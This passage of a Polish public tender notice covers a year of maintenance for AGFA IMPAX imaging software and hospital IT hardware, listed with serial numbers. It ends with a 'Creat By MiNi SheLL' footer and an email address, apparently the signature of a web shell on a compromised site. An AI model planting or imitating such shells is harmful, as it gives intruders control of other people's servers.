 7.) Wykonawca zobowiązany będzie do prowadzenia dyżurów 24/7 dla wsparcia zdalnego oprogramowania. <br>
 8.)  Wykonawca zapewni bieżący upgrade do nowej wersji oprogramowania.<br>
1.3.   Każdorazowo po wykonaniu przeglądu okresowego Wykonawca wyda stosowny certyfikat poświadczający przeprowadzenie prac konserwacyjnych przez autoryzowany serwis. <br> 
1.4. Wykonawca zobowiązany będzie do prowadzenia Konsultacji Technicznych dla wskazanych Użytkowników w wymiarze do 16 godzin rocznie w dowolnie wybranych przez Zamawiającego cyklach min. 1 godzinnych. Termin Konsultacji Technicznej zostanie ustalony między Wykonawcą a  Zamawiającym z 3 dniowym wyprzedzeniem. Fakt odbycia Konsultacji Technicznych zostanie  potwierdzony w formie pisemnej na podstawie wypełnionego każdorazowo formularza dostarczanego przez Zamawiającego.<br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - świadczenie usług serwisowych sprzętu komputerowego, na którym funkcjonuje oprogramowanie AGFA IMPAX 6.x..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1. Świadczenie usług serwisowych sprzętu komputerowego, na którym funkcjonuje oprogramowanie AGFA IMPAX 6.x. - dotyczy:<br>
- STACJI ROBOCZEJ HP XW6600 nr seryjny CZC9032WK7, <br>
- MONITORA DIAGNOSTYCZNEGO BARCO NIO 2MP 21 cali nr seryjny 1890156380, <br>
- MONITORA DIAGNOSTYCZNEGO BARCO NIO 2MP 21 cali nr seryjny 1890156382,<br> 
- MONITORA OPISOWEGO HP LCD 19cali nr seryjny CNK8431W4P, <br>
- CZUJNIKA KALIBRACYJNEGO BARCO nr seryjny 090225145,<br> 
- ZASILACZA AWARYJNEGO UPS 750VA PW 5115 nr seryjny GB361A0962, <br>
- BIBLIOTEKI TAŚMOWEJ HP MSL 6030 nr seryjny 2U29040009, <br>
- INFRASTRUKTURY (OBUDOWY) SERWERÓW KASETOWYCH (BLADE) HP C3000 nr seryjny CZC9030B5V,<br>
- SERWERA HP BLADE BL465C nr seryjny CZJ90303H9,  <br>
- SERWERA HP BLADE BL465C nr seryjny CZJ90303HA, <br>
- SERWERA HP BLADE BL465C nr seryjny CZJ90303H2,<br>       
- SERWERA HP BLADE BL465C nr seryjny CZJ90303GB,<br>   
- ZASILACZA AWARYJNEGO HP R5500 XR - INTL UPS  nr seryjny MX18410847,<br>  
- ZASILACZA AWARYJNEGO HP R5500 XR - ERM UPS  nr seryjny MX18361952, <br>
- ZASILACZA AWARYJNEGO HP R5500 XR - INTL UPS  nr seryjny MX18420289, <br>   
- ZASILACZA AWARYJNEGO HP R5500 XR - ERM UPS  nr seryjny MX18361953,<br>  
- ROUTERA CISCO 871  nr seryjny FCZ124391Z9, <br>                                       
- SWITCHA LAN CISCO  nr seryjny F0C1222T1MG,<br>                         
- SWITCHA LAN CISCO  nr seryjny F0C1222T1GJ, <br>                                
- SWITCHA SAN BROCADE nr seryjny CN88427042, <br>                             
- SWITCHA SAN BROCADE nr seryjny CN8848703P,<br>        
- MACIERZY DYSKOWEJ ZEWNĘTRZNEJ HP MSA2000 nr seryjny 3CL843C127, <br>  
- MACIERZY DYSKOWEJ ZEWNĘTRZNEJ HP MSA2000 nr seryjny 3CL849C599,<br>  
- DYSKU SAS 15K 450GB (12 SZT.),<br>                                  
- DYSKU SAS 15K 146GB (12 SZT.),<br>                                                         
- SYSTEMU PRODUKCJI PŁYT Z BADANIAMI DLA PACJENTÓW RIMAGE 2000i nr seryjny 
  10019742,<br>     
- MONITORA LCD DELL 17 cali nr seryjny 8A7-3WGS, <br>   
- KOMPUTERA STERUJĄCEGO DELL PRECISION 690 nr seryjny 75YNH3J,<br>                
- STATYWU FLFS,<br>  
- KRATKI FLFS,<br>                                                            
- WINDY FLFS,<br>                 
- KASETY Z PŁYTĄ OBRAZOWĄ 35x43 CM TYPU MD 4.1. - 3 szt.,<br>         
- SWITCHA TYP 3COM 4200G48Port nr seryjny YFCFA8MFA7200.<br>   
1.2.  Obsługa serwisowa obejmuje:<br>  
1.) Wykonywanie planowych konserwacji okresowych zgodnie z zaleceniami producenta min. 2 przeglądy okresowe w trakcie trwania umowy.<br> 
2.) Fizyczne czyszczenie sprzętu informatycznego raz na 6 miesięcy.<br> 
3.) Wykonawca zobowiązany będzie do  usuwania awarii systemu bez dodatkowego  obciążenia  Zamawiającego kosztem robocizny, dojazdu, części zamiennych w szczególności podzespołów komputerowych w przypadku ich wymiany.<br>  
4.) Wykonawca zobowiązany będzie do świadczenia Usług Serwisowych dla sprzętu komputerowego od  poniedziałku  do piątku w godz. 8:00 do 16:00 z wyłączeniem świąt oraz dni ustawowo wolnych od pracy.<br>  
5.) Zapewnienie reakcji ze strony serwisu w rozumieniu jako podjęcie interwencji naprawy zdalnej w ciągu 1 godziny od chwili pisemnego lub telefonicznego zgłoszenia usterki przez Zamawiającego.<br> 
6.)  Zapewnienie reakcji ze strony serwisu w rozumieniu jako podjęcie naprawy na miejscu u Zamawiającego w ciągu 24 godziny od chwili pisemnego lub telefonicznego zgłoszenia usterki przez Zamawiającego.<br> 
7.)Wykonawca zobowiązany będzie do bezpłatnego podłączenia kolejnych urządzeń diagnostycznych do Systemu w okresie obowiązywania umowy.<br>     
1.3.   Po każdym przeglądzie Wykonawca przekaże Zamawiającemu świadectwo sprawności sprzętu komputerowego.<br>  
1.4. Po każdej wizycie serwisowej Wykonawca przekaże Zamawiającemu raport serwisowy.<br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com